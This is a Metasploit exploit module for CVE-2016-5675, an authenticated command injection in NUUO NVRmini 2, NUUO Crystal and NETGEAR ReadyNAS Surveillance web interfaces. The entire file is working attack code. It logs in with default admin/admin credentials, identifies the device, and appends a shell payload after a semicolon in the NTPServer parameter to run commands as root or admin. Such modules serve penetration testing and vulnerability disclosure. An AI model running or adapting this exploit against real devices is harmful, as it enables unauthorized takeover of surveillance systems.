##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'NUUO NVRmini 2 / Crystal / NETGEAR ReadyNAS Surveillance Authenticated Remote Code Execution',
      'Description' => %q{
        The NVRmini 2 Network Video Recorder, Crystal NVR and the ReadyNAS Surveillance application are vulnerable
        to an authenticated remote code execution on the exposed web administration interface. An administrative
        account is needed to exploit this vulnerability.
        This results in code execution as root in the NVRmini and the 'admin' user in ReadyNAS.
        This exploit has been tested on several versions of the NVRmini 2, Crystal and the ReadyNAS Surveillance.
        It probably also works on the NVRsolo and other Nuuo devices, but it has not been tested
        in those devices.
      },
      'Author' =>
        [
          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '2016-5675'],
          ['US-CERT-VU', '856152'],
          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-nvr-vulns.txt'],
          ['URL', 'http://seclists.org/bugtraq/2016/Aug/45']
        ],
      'DefaultOptions' => { 'WfsDelay' => 5 },
      'Platform' => 'unix',
      'Arch' => ARCH_CMD,
      'Privileged' => false,  # Runs as root in NVRmini 2 / Crystal, admin in ReadyNas
      'Targets' =>
        [
          [ 'Automatic', { } ],
          [ 'NUUO NVRmini 2', {
            'Payload' =>
              {
                'Space' => 1024,    # Actually it might be the GET request length, but this is a safe value
                'DisableNops' => true,
                'Compat'      =>
                  {
                    'PayloadType' => 'cmd',
                    'RequiredCmd' => 'netcat generic perl'
                  }
              },
          }],
          [ 'ReadyNAS NETGEAR Surveillance', {
            'Payload' =>
              {
                'Space' => 1024,    # Actually it might be the GET request length, but this is a safe value
                'DisableNops' => true,
                'Compat'      =>
                  {
                    'PayloadType' => 'cmd',
                    'RequiredCmd' => 'netcat generic perl'
                  }
              },
          }],
          [ 'NUUO Crystal', {
            'Payload' =>
              {
                'Space' => 1024,    # Actually it might be the GET request length, but this is a safe value
                'DisableNops' => true,
                'Compat'      =>
                  {
                    'PayloadType' => 'cmd',
                    'RequiredCmd' => 'bash'
                  }
              },
          }],
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Aug 4 2016'))

    register_options(
      [
        Opt::RPORT(8081),
        OptString.new('TARGETURI', [true,  "Application path", '/']),
        OptString.new('USERNAME', [true, 'The username to login as', 'admin']),
        OptString.new('PASSWORD', [true, 'Password for the specified username', 'admin']),
      ])
  end


  def id_target
    return target if target.name != 'Automatic'
    res = send_request_cgi({
      'uri' => normalize_uri(datastore['TARGETURI'])
    })
    if res && res.code == 200
      if res.body.to_s =~ /var VENDOR_NAME = "Netgear";/
        print_status("#{peer} - Identified NETGEAR ReadyNAS Surveillance as the target.")
        return targets[2]
      elsif res.body.to_s =~ /v_web_login_login_type/
        print_status("#{peer} - Identified NUUO Crystal as the target.")
        return targets[3]
      else
        print_status("#{peer} - Identified NUUO NVRMini 2 as the target.")
        return targets[1]
      end
    end
  end


  def exploit
    res = send_request_cgi({
            'method' => 'POST',
            'uri' => normalize_uri(datastore['TARGETURI'], "login.php"),
            'vars_post' => {
              'user' => datastore['USERNAME'],
              'pass' => datastore['PASSWORD'],
              'submit' => "Login"
            }
        })

    if res && (res.code == 200 || res.code == 302)
      cookie = res.get_cookies
    else
      fail_with(Failure::Unknown, "#{peer} - Failed to log in with the provided credentials.")
    end

    my_target = id_target
    if my_target == targets[1]
      if payload.raw.include?("perl")
        fail_with(Failure::Unknown, "The NVRmini 2 only supports generic or netcat payloads.")
      end
      print_status("#{peer} - Executing payload...")
      send_request_cgi({
          'uri' => normalize_uri(datastore['TARGETURI'], "handle_daylightsaving.php"),
          'cookie' => cookie,
          'vars_get' => {
            'act' => "update",
            'NTPServer' => rand_text_alpha(12 + rand(8)) + ";" + payload.encoded
          }
        }, 1)
    elsif my_target == targets[2]
      if payload.raw.include?("netcat")
        fail_with(Failure::Unknown, "ReadyNAS Surveillance does not support netcat payloads.")
      end
      # We also have to fix the perl payload - there's an IO import error on the ReadyNAS that blows
      # it up.
      print_status("#{peer} - Executing payload...")
      send_request_cgi({
          'uri' => normalize_uri(datastore['TARGETURI'], "handle_daylightsaving.php"),
          'cookie' => cookie,
          'vars_get' => {
            'act' => "update",
            'NTPServer' => rand_text_alpha(12 + rand(8)) + ";" + payload.raw.gsub("-MIO ", "-MIO::Socket ")
          }
        }, 1)
    else
      if not payload.raw.include?("exec")
        fail_with(Failure::Unknown, "NUUO Crystal only supports bash payloads.")
      end
      print_status("#{peer} - Executing payload...")
      send_request_cgi({
          'uri' => normalize_uri(datastore['TARGETURI'], "handle_daylightsaving.php"),
          'cookie' => cookie,
          'vars_get' => {
            'act' => "update",
            'NTPServer' => rand_text_alpha(12 + rand(8)) + ";" + payload.raw
          }
        }, 1)
    end
    handler
  end
end
